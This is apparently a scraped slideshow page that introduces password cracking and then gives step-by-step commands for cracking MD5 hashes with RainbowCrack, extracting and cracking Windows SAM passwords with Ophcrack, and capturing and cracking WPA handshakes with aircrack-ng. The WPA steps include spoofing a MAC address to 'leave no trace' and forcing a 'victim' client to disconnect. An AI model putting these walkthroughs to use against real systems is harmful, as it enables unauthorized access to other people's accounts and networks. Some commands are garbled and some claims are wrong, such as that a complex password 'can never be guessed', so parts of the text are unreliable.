What Password Cracking Password cracking is the process of recovering secret passwords from data that has been stored in or transmitted by a computer.

Slides:



Advertisements
Similar presentations
Overview How to crack WEP and WPA
Advertisements

Installing DOS and Windows98 under MS Virtual PC.
PC Encryption installation progress/password screen Includes comments from: Encryption team Sarah Deane Tony Stieber Selected people who took part in the.
FILEMAKER SERVER SOFTWARE & REMOTE ADMINISTRATION
Crack WEP Lab Last Update Copyright 2014 Kenneth M. Chipps Ph.D.
DSL-2730B, DSL-2740B, DSL-2750B.
VMWare Workstation Installation. Starting Vmware Workstation Go to the start menu and start the VMware Workstation program. *Note: The following instructions.
Wireless Cracking By: Christopher Zacky.
Crack WPA Lab Last Update Copyright 2014 Kenneth M. Chipps Ph.D.
Two-Factor Authentication & Tools for Password Management August 29, 2014 Pang Chamreth, IT Development Innovations 1.
The Cain Tool Presented by: Sagar Chivate CS 685F.
Attack and Defense in Wireless Networks Presented by Aleksandr Doronin.
SYSTEM ADMINISTRATION Chapter 19
1 MD5 Cracking One way hash. Used in online passwords and file verification.
(NHA) The Laboratory of Computer Communication and Networking Network Host Analyzer.
What are Rainbow Tables? Passwords stored in computers are changed from their plain text form to an encrypted value. These values are called hashes, and.
DVG-N5402SP.
 Any unauthorized device that provides wireless access  Implemented using software, hardware, or a combination of both  It can be intentional or unintentionally.
File sharing. Connect the two win 7 systems with LAN card Open the network.
Cisco Confidential 1 © 2011 Cisco and/or its affiliates. All rights reserved.
Engineering H192 - Computer Programming The Ohio State University Gateway Engineering Education Coalition Lect 4P. 1Winter Quarter Introduction to UNIX.
Dainis Krakops’ Wireless Network MOTOROLA SURFboard SB5101 CABLE MODEM Enables cable operators to provide broadband Internet connection for my LAN devices.
L INUX C OMMAND L INE I NTERFACE G UNAANBAN.G
One to One instructions Installing and configuring samba on Ubuntu Linux to enable Linux to share files and documents with Windows XP.
Eucalyptus Virtual Machines Running Maven, Tomcat, and Mysql.
BIF713 Operating Systems & Project Management Instructor: Murray Saul
How to Download and Install a Sharp Print Driver on a Mac.
Using the “Setup Assistant” to configure your new Mac Personalizing your new Mac.
VPN AND SECURITY FLAWS Rajesh Perumal Clemson University.
Guide to Linux Installation and Administration, 2e1 Chapter 3 Installing Linux.
The Truth About Protecting Passwords COEN 150: Intro to Information Security Mary Le Carol Reiley.
Steps To Set Up Your Home Wireless Network You can use a wireless network to share Internet access, files, printers, and more. Or you can use it to surf.
SNORT Tutorial Sreekanth Malladi (modifying original by N. Youngworth)
Background - hardware User interface devices to system –Mainframe Text mode only Command-line (text mode) interface “Some” menus available (NOT a GUI)
Information Security 493. Lab 11.3: Encrypt a Windows File Windows operating systems since Windows 2000 have included the ability to encrypt files. Follow.
Chapter Three The UNIX Editors. 2 Lesson A The vi Editor.
Installing SIGNZ on a stand- alone machine. These slides will guide you through the installation of the SIGNZ ‘server’ and ‘client’ components on one machine.
1. Insert the Resource CD into your CD-ROM drive, click Start and choose Run. In the field that appears, enter F:\XXX\Setup.exe (if “F” is the letter of.
Mark Shtern. Passwords are the most common authentication method They are inherently insecure.
Installation Overview Lab#2 1Hanin Abdulrahman. Installing Ubuntu Linux is the process of copying operating system files from a CD, DVD, or USB flash.
Hiding Data in “Plain Sight” Computer Forensics BACS 371.
Booting Ubuntu Linux Live CSCI 130 – Fall 2008 Action Lab Dr. W. Jones.
Downloading and Installing Autodesk Revit 2016
Computer Networking From LANs to WANs: Hardware, Software, and Security Chapter 13 FTP and Telnet.
Downloading and Installing Autodesk Inventor Professional 2015 This is a 4 step process 1.Register with the Autodesk Student Community 2.Downloading the.
How Safe are They?. Overview Passwords Cracking Attack Avenues On-line Off-line Counter Measures.
Training on Basic Software Hardware Installation
CNIT 124: Advanced Ethical Hacking Ch 9: Password Attacks.
DHP Agenda: How to Access Web Interface of the DHP-1320 on Access Point Mode How to Access Web Interface of the DHP-1320 on Router Mode How to Change.
Lesson 3-Touring Utilities and System Features. Overview Employing fundamental utilities. Linux terminal sessions. Managing input and output. Using special.
SCSC 455 Computer Security Chapter 3 User Security.
© Copyright 2009 SSLPost 01. © Copyright 2009 SSLPost 02 a recipient is sent an encrypted that contains data specific to that recipient the data.
These steps will guide you through installing the pcAnywhere Host software so that we can remote control your PC from NZ! Once installed, it will only.
Password Security Module 8. Objectives Explain Authentication and Authorization Provide familiarity with how passwords are used Identify the importance.
CSCI 530 Lab Passwords. Overview Authentication Passwords Hashing Breaking Passwords Dictionary Hybrid Brute-Force Rainbow Tables Detection.
 Encryption provides confidentiality  Information is unreadable to anyone without knowledge of the key  Hashing provides integrity  Verify the integrity.
WPA Cracking with Rainbow Tables For Educational Purposes Only Kurt Wondra November 18 th, 2010  1) Scanning for Vulnerable Networks  2) Capturing Usable.
INTERNET APPLICATIONS CPIT405 Install a web server and analyze packets.
Chapter 7: Using Network Clients The Complete Guide To Linux System Administration.
Guide to Linux Installation and Administration, 2e
Presented By: Rohit Maurya
Only For Education Purpose
Creating a Windows 10 Virtual machine
How do I find my PDF password with simple operations.
PHP: Security issues FdSc Module 109 Server side scripting and
Hardware Appliance Installation and Configuration
Lecture9: Embedded Network Operating System: cisco IOS
Lecture9: Embedded Network Operating System: cisco IOS
Presentation transcript:

What Password Cracking Password cracking is the process of recovering secret passwords from data that has been stored in or transmitted by a computer system. A common approach is to repeatedly try guesses for the password. Most passwords can be cracked by using following techniques :

Hashing Here we will refer to the one way function (which may be either an encryption function or cryptographic hash) employed as a hash and its output as a hashed password. Hash functions like SHA-512, SHA-1, and MD5 are considered impossible to invert when used correctly.

Guessing Many passwords can be guessed either by humans or by sophisticated cracking programs armed with dictionaries (dictionary based) and the user's personal information. Not surprisingly, many users choose weak passwords, usually one related to themselves in some way. Repeated research over some 40 years has demonstrated that around 40% of user-chosen passwords are readily guessable by programs. Examples of insecure choices include:

Guessing blank (none) the word "password", "passcode", "admin" and their derivatives the user's name or login name the name of their significant other or another person (loved one) their birthplace or date of birth a pet's name automobile licence plate number a row of letters from a standard keyboard layout (eg, the qwerty keyboard -- qwerty itself, asdf, or qwertyuiop)

Guessing In one survey of MySpace passwords which had been phished, 3.8 percent of passwords were a single word found in a dictionary, and another 12 percent were a word plus a final digit A password containing both uppercase & lowercase characters, numbers and special characters too; is a strong password and can never be guessed.

Default Passwords A moderately high number of local and online applications have inbuilt default passwords that have been configured by programmers during development stages of software. A list containing default passwords of some of the most popular applications is available on the internet. Always disable or change the applications' (both online and offline) default username-password pairs.

Brute Force If all other techniques failed, then attackers uses brute force password cracking technique. Here an automatic tool is used which tries all possible combinations of available keys on the keyboard. This techniques takes extremely long time to complete, but password will surely cracked. Longer is the password, large is the time taken to brute force it.

Phishing This is the most effective and easily executable password cracking. Phishing is a technique in which the attacker creates the fake login screen and send it to the victim, hoping that the victim gets fooled into entering the account username and password. As soon as victim click on "enter" or "login" login button this information reaches to the attacker using scripts or online form.

RainBow Tables Passwords are normally stored in one-way hashes. When a password is created, the user types the password in what is called "plain text", since it is in a plain, unhashed form. However, after a password is made, the computer stores a one-way hash of the password that obfuscates it. Hashes are made to be one-way, which means algorithmic reversal is impossible. This means we have to crack those hashes!

Principle Rainbow tables work on the principle of a time- memory trade-off. This means that hashes are pre-generated by a computer and stored in a large rainbow table file with all of the hashes and words that correspond to them. Rainbow cracking can greatly reduce the amount of time it takes to crack a password hash, plus you can keep the tables, so you only have to generate them once!

Download & Install RainbowCrack RainbowCrack is the tool that we are going to be using to generate and use rainbow tables. 1.Download RainbowCrack. tar zxvf Change to the new directory that has been made from extracting RainbowCrack. cd 4.Configure the installation../configure 5.Now, compile the source code for installation. make && sudo make install

Step 2 Generate a Rainbow Table and Crack with It Now, lets generate a table that consists of all the alpha-lowercase and numeral characters. We want these to use the MD5 hash algorithm and be between 4-6 characters. All OS users must open a terminal, or a command prompt and be located in the RainbowCrack working directory. 1.In your working directory, issue the following command to start table generation. rtgen md5 loweralpha-numeric Sort the tables so the processor can access them quicker. The table files will be in the current directory. Run the following command on each of the files in the directory ending in *.rt. rtsort This will take about 6 hours to generate on a single core processor. After you generate the table, let's practice using it on a word. 1.Let's hash the word "burger" with the MD5 algorithm and then use our tables to crack it. Notice the b is in lowercase. Here is our result: 6e69685d22c94ffd42ccd7e70e246bd9 2.Crack the hash with the following command, along with the path to your file. rcrack -h 6e69685d22c94ffd42ccd7e70e246bd9 It will return your hash. You'll see it is a lot faster than if you were try to bruteforce the six character hash

Crack Windows

Lets get started.... Insert the Ophcrack Live CD and Boot your PC. Make sure the Boot from CD is the first option in the Boot menu at BIOS. You'll get the Startup menu. here choose Ophcrack Graphic mode – automatic After few old loading shots, it'll redirect to the Linux Desktop. There Click on menu > Run

Crack Windows In the pop up box type > ophcrack click ok Now you can see the ophcrack application windows. Here, click on Load > Encrypted SAM After that we need to give the path to SAM directory which is by default /mnt/hda1/WINDOWS/System32 click choose Here we can see the saved hashed now with the username and userid. Now click on Crack button and wait for the password. Its quick and easy That's it. It'll show the password now Have fun with the cracked password. Note: Ophcrack is a live Linux CD, it may not work on all the versions of Windows 7 however its working fine with Windows XP/Vista.

Tools for WEP and WPA

airmon-ng airmon-ng stop (interface) ifconfig (interface) down macchanger —mac 00:11:22:33:44:55 (interface) airmon-ng start (interface)

airodump-ng (interface)

airodump-ng -c (channel) -w (file name) —bssid (bssid) (interface)

aireplay-ng a (bssid) -h 00:11:22:33:44:55 -e (essid) (interface)

aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 (interface)

aircrack-ng -b (bssid) (file name-01.cap)

Crack WPA Step 1: Run this command to check available Wlan adapters. airmon-ng It should give you output something like below. Now we know that we have only one wireless interface wlan0 lets proceed to step 2

Step 2: Now lets try to start the airmon service on the interface that we have just. airmon-ng start wlan0

Crack WPA

Step 3: You should see another monitoring interface mon0 on your system by using command ifconfig or you can the same command we did on Step 1 Here we can see the new monitoring interface mon0

Step 4: A good hacker is always suppose to leave no trace back of his break-in. If you run the command ifconfig and notice you will find that the monitoring interface mon0 and Wireless interface Wlan0 are sharing the same MAC address. In actual mon0 is sharing the same mac address as Wlan0.

Now we have to put a fake mac address on the monitoring interface to leave no trace. Lets make the mon0 interface down by running the command ifconfig mon0 down Next lets change the MAC address of mon0 interface by running the below command macchanger –m 00:11:22:33:44:55 mon0

Now since we have changed the MAC address on MON0 lets bring the interface back up again using the below command ifconfig mon0 up Now just to be sure lets run the same command ‘ifconfig’ that we have already used earlier above in Ifconfig Here we can see we have sucessfully changed the MAC address for our monitoring interface mon0

Step 5: Lets start dumping the available wireless information. run the below command airodump-ng mon0 Here my Victim router ESSID is AndroidHotSpot. The information we need from here is BSSID MAC details: D0:C1: B1:5B:AC:33 CHANNEL: 6

Step 6: By now we have identified our victim its time to further narrow down this network. We need to know how many workstation/terminal connected to this wireless. airodump-ng –c 6 –w crackwpa –bssid 02:1A:11:FE:A4:CE

We can see that one client having mac address highlighed in green is connected to this hotspot. To find the password either you need to be patient to wait another client connect to this hotspot but time is money lets force this client to reconnect and make the handshake auth with the server so that we can take the packets Note: Keep this ssh session close and open another terminal. Do not close the existing session

Step 7: Lets force the already connected session to make a auth handshake again Run the given below command in the new terminal session aireplay-ng –0 –4 –a MAC-ADDR-OF-ROUTER –c MAC-ADDR-OF-CLIENT mon0

Final Step: Now finally we have all the dump saved in the working directory we just need to crack the packet capture using dictionary file. Run the below command aircrack-ng crackwpa-01.cap –w list crackwpa-01.cap is the filename of the capture packet list if the my dictionary file name